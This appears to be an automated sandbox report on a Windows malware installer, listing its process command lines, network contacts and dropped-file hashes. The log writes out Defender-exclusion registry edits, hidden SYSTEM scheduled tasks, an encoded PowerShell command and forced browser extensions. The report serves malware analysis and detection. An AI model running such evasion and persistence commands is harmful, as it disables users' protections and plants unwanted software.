powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiJitsNRDAtU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiJitsNRDAtU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\atUnoJEcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\atUnoJEcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bHChqWbaifmeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bHChqWbaifmeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tYlulnlhfvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tYlulnlhfvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hdPjkOXNzukcsjVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hdPjkOXNzukcsjVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HbtuuClNkkkdGbCN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HbtuuClNkkkdGbCN\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OiJitsNRDAtU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\atUnoJEcU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHChqWbaifmeC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tYlulnlhfvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hdPjkOXNzukcsjVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hdPjkOXNzukcsjVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HbtuuClNkkkdGbCN /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HbtuuClNkkkdGbCN /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gqGXyUtcu" /SC once /ST 06:42:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gqGXyUtcu"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gqGXyUtcu"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eKTzntQiDjkvtKkfQ" /SC once /ST 11:15:55 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe\" qB /Zgsite_idObI 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "eKTzntQiDjkvtKkfQ"

C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe

C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe qB /Zgsite_idObI 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bjzvzwrptCEFdBfgJx"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\atUnoJEcU\wUHcGx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "azeUktJAaUwkEYH" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "azeUktJAaUwkEYH2" /F /xml "C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "azeUktJAaUwkEYH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "azeUktJAaUwkEYH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "OSQnjExwMsDOMr" /F /xml "C:\Program Files (x86)\OiJitsNRDAtU2\YqdZEqY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KAxEQLlfNMoXA2" /F /xml "C:\ProgramData\hdPjkOXNzukcsjVB\cntsWEX.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KELEMENFVUYfdfdjp2" /F /xml "C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\vFIWIzm.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "hcXcPAZNWkBjDRtiAcA2" /F /xml "C:\Program Files (x86)\bHChqWbaifmeC\yfYcztl.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "CtcwvJUdbvqSdFcLs" /SC once /ST 17:52:06 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll\",#1 /QIsite_idWIB 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "CtcwvJUdbvqSdFcLs"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll",#1 /QIsite_idWIB 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll",#1 /QIsite_idWIB 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eKTzntQiDjkvtKkfQ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "CtcwvJUdbvqSdFcLs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
GB 23.44.234.16:80 tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 121.118.77.104.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 171.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
DE 142.250.185.174:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 74.185.250.142.in-addr.arpa udp
US 8.8.8.8:53 174.185.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.16.217.172.in-addr.arpa udp
DE 142.250.185.174:443 clients2.google.com tcp
US 8.8.8.8:53 65.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 api2.check-data.xyz udp
US 44.240.147.44:80 api2.check-data.xyz tcp
US 8.8.8.8:53 44.147.240.44.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe

MD5 0a35bbd6448122353a2d8ea91cff5781
SHA1 742ec335853eba4e5b41200fa46958328e90cb2f
SHA256 ccc5f37eb38a137f33f8f0d603f88f178056a9c576c316f6a366727e07c9a0bb
SHA512 5c4dbc03b3c43ddea27bb6df56e5e317c64237018e325a84b257847e4223f0c3302f10b9ab5956ef7e197c237f7d346fbddbb7ee06856b42314cc0b85f300b8f

memory/1648-16-0x00000000008B0000-0x0000000000F65000-memory.dmp

memory/1648-17-0x0000000010000000-0x0000000011E5C000-memory.dmp

memory/3168-20-0x0000000002E80000-0x0000000002EB6000-memory.dmp

memory/3168-21-0x0000000073620000-0x0000000073DD0000-memory.dmp

memory/3168-23-0x0000000002ED0000-0x0000000002EE0000-memory.dmp

memory/3168-22-0x0000000002ED0000-0x0000000002EE0000-memory.dmp

memory/3168-24-0x0000000005790000-0x0000000005DB8000-memory.dmp

memory/3168-25-0x00000000054C0000-0x00000000054E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rtfjjuiw.gm4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3168-26-0x0000000005DC0000-0x0000000005E26000-memory.dmp

memory/3168-32-0x0000000005E30000-0x0000000005E96000-memory.dmp

memory/3168-37-0x0000000005FA0000-0x00000000062F4000-memory.dmp

memory/3168-38-0x0000000006470000-0x000000000648E000-memory.dmp

memory/3168-39-0x00000000064C0000-0x000000000650C000-memory.dmp

memory/3168-42-0x0000000073620000-0x0000000073DD0000-memory.dmp

memory/1648-46-0x00000000008B0000-0x0000000000F65000-memory.dmp

memory/4644-48-0x00000000006F0000-0x0000000000DA5000-memory.dmp

memory/4644-49-0x0000000010000000-0x0000000011E5C000-memory.dmp

memory/1112-52-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/1112-53-0x00000000034C0000-0x00000000034D0000-memory.dmp

memory/1112-54-0x00000000034C0000-0x00000000034D0000-memory.dmp

memory/1112-64-0x0000000004320000-0x0000000004674000-memory.dmp

memory/1112-65-0x00000000049A0000-0x00000000049EC000-memory.dmp

memory/1112-68-0x00000000735F0000-0x0000000073DA0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

memory/4708-70-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/4708-72-0x0000000003230000-0x0000000003240000-memory.dmp

memory/4708-71-0x0000000003230000-0x0000000003240000-memory.dmp

memory/4708-82-0x00000000041E0000-0x0000000004534000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7cd1fc869c686c660073b9e811a89e3c
SHA1 67acf340bead8ee326dacbb3f9c9e91775d8adac
SHA256 c6a11f8fc328b7619e240da4d08b884472b562ea5607da2481c32cb8fca87c9c
SHA512 0a584776f135737967d6d7e61fabb75d78127fb9e2ce734e306db86d337b078b59a41a942f6ed9809fbef203dcd00919abe4eca07effc1b0a65a5e2df3351492

memory/4708-85-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/4432-97-0x000001D9F8FB0000-0x000001D9F8FD2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f7ea21a8fddaba9501a691d170906825
SHA1 b7ce7dd9b54c9b47f1b5e718450992293ab707d0
SHA256 8ed5c87fa3283933acf4db8d457a291c12081eca783337cce61a1e52d9b240bc
SHA512 16aa131666d33ff4b7c0789482707ce29050a2ede1166670ade15d77c7c542261c8de9fcda3e7e26a7ffd9587f5ab4ec36f36a52eeb467ec0c98b537243a66a3

memory/4432-100-0x000001D9F6E30000-0x000001D9F6E40000-memory.dmp

memory/4432-99-0x000001D9F6E30000-0x000001D9F6E40000-memory.dmp

memory/4432-98-0x00007FFA2AD20000-0x00007FFA2B7E1000-memory.dmp

memory/4432-104-0x00007FFA2AD20000-0x00007FFA2B7E1000-memory.dmp

memory/4644-105-0x00000000006F0000-0x0000000000DA5000-memory.dmp

memory/3912-110-0x0000000000170000-0x0000000000825000-memory.dmp

memory/4644-111-0x00000000006F0000-0x0000000000DA5000-memory.dmp

memory/3912-112-0x0000000010000000-0x0000000011E5C000-memory.dmp

memory/4016-125-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/4016-127-0x0000000003280000-0x0000000003290000-memory.dmp

memory/4016-129-0x0000000003280000-0x0000000003290000-memory.dmp

memory/3912-123-0x00000000025F0000-0x0000000002675000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f5caea41ccb7c13988a362ef6b2f3a1c
SHA1 f31ad94f89bd21eb58f73ec83b11613f9ef3f199
SHA256 1a90087699459e1c6d059bc5739b1a7270c3ebe493778a70bd5b2bbf4194061a
SHA512 db305daae6c012b820da9186f94a6f8a1cc8e1e3e4ba9d7eafa6523b8bc3188310a338750684dd2e062e36e7882dab3892325a3025045d62572c000e118cc65a

memory/4016-160-0x0000000004CF0000-0x0000000004D3C000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 3a8199aab1c74eae07fe583af9439e48
SHA1 28bbd7e62698c90631cd51ab23e773a1a9a2fe1b
SHA256 de3c96adcc032cf625d6811ac747c5189e2dfd7d4b097cb019bbeee552b1f2cb
SHA512 730d34973229a6a28e0584fae5ac307bb399907061b78563db648877579587fec59dd5eedcab9a565e770806950829a5fa58fb72db00d178e234897186351c3d

memory/4016-171-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/3912-181-0x0000000002FE0000-0x0000000003047000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 fb11ad5cc456952496ec84f9330e7017
SHA1 75457e8a9d40a5a63e72bc80c5ec974761185898
SHA256 181ae1748ee78f79f3fb2956a71ba0959082b9e67f2a72dc2b459110bb2be859
SHA512 a2252651ea91142e9a21896455b43f7162c15992bef62725af6201f5cacbc5f3c646e465c6e311a9a261549092b59c659e4b23ee940ea7af04e373b7d4564e1b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml

MD5 8d0a21d486dcd77ab10e1804e0348b28
SHA1 a79fb9c55a546c2c154a650bfe05630ebb5278af
SHA256 b2d0283e798b6a410c7d86fd7404997e1ced14c5ee2153bfab80d2261776a032
SHA512 f9ee6f8d4a143a3155739109ad4b1a63c6e63a36f0b89f12d3aac6c10065bd0c2f388749c5a45c8f138b8c9685f088cd153266f7ac7370eb8081a45766061807

C:\Program Files (x86)\OiJitsNRDAtU2\YqdZEqY.xml

MD5 0d77523629a6adfdb0982221e53fbc67
SHA1 c7eccf68eefed77f929a4316bd0e3c11f9573755
SHA256 78f3d2fe4f2c931611b9600ec31b1d69975d30ceec051dea9143beb3998eb01c
SHA512 0a4d1e2fe4eede33d6334c4aa20a86164da4d521e2d2575e0c46419db8de7ff32d76fbca56311eff52893f61b1fc06dac4bb222c7cecf6b4e94a869b50901846

C:\ProgramData\hdPjkOXNzukcsjVB\cntsWEX.xml

MD5 45eaebc48b488978ca753bd709465b8c
SHA1 bdccf353bf5f6b4a2210f547a70d79b94e7c7044
SHA256 bbe1d2ca2b6c8b775a6860fd7b1f94eaeb5f4371f7ac98fa73cd571b9ee7aeb2
SHA512 74a2e98e54fe50123d3bf228a405eaebb22e66388f5e96cfe320c622ebfd27f4b82f4777febd32934464850052e5e406e9419c8d5a51679a2a0a77b49e8dba7f

C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\vFIWIzm.xml

MD5 ebc5dd911d60d18866419aa5d21bda06
SHA1 1860762977cf57cffcf78d0ccc19f2f98d887080
SHA256 09c5f307856e0740cf6c7a5320939a9b117bb58b35f5fe13319e1e5f1707a3db
SHA512 01c08e2df9612dc047991e129c86a5e08ffd5e61c28cb48d5029519431fd1bf616a3af513ec2d547314e62bb92e85a958d446b0358080dcaafe32132de7f17e2

C:\Program Files (x86)\bHChqWbaifmeC\yfYcztl.xml

MD5 32dbe186449b9e95e474a229372a02fb
SHA1 e17a10c3676caa434ad5d6e0aba162f76dfa0cd6
SHA256 d8da474142896decd552581966103be1c743c7a52675a649f8b97e51ffefcb1a
SHA512 3c953ed4b866dbc8e927133fc447ed4ba87927985a99b9ad921fd05108b9079fa81bb4f3134f05f3fd8702c4ad1833b792bfb2b39a91693813744d3c92b71555

C:\Windows\Temp\HbtuuClNkkkdGbCN\CABuVHnl\UeMUeaZ.dll

MD5 09033b0a28848c69df1d9123aa263242
SHA1 ea1f63365ab26e8250eec85496f7b7baab1c5619
SHA256 fc35ae17402f158f5fc7f179d35542c363ca5681c82e72d7f0f59f80f86b2ee7
SHA512 9e99a8a584f4831bed290361d719e6a9561455d22b9e650d68d970d2258bd7db465edc7b9c9a9e9565aeefbe871e298dba66470c260b51e4482b76d43f13097d

memory/3912-511-0x0000000003050000-0x00000000030D3000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0etkwu5l.default-release\prefs.js

MD5 0fccc75bd9c0494a133798b5b6d398da
SHA1 d7b23c6bf04704834ead0e99a4ac907a652e0719
SHA256 be435e0cfc5a5a78e736bcd57bf76725f5a91e3ce5d099eeeab9084e8deb2682
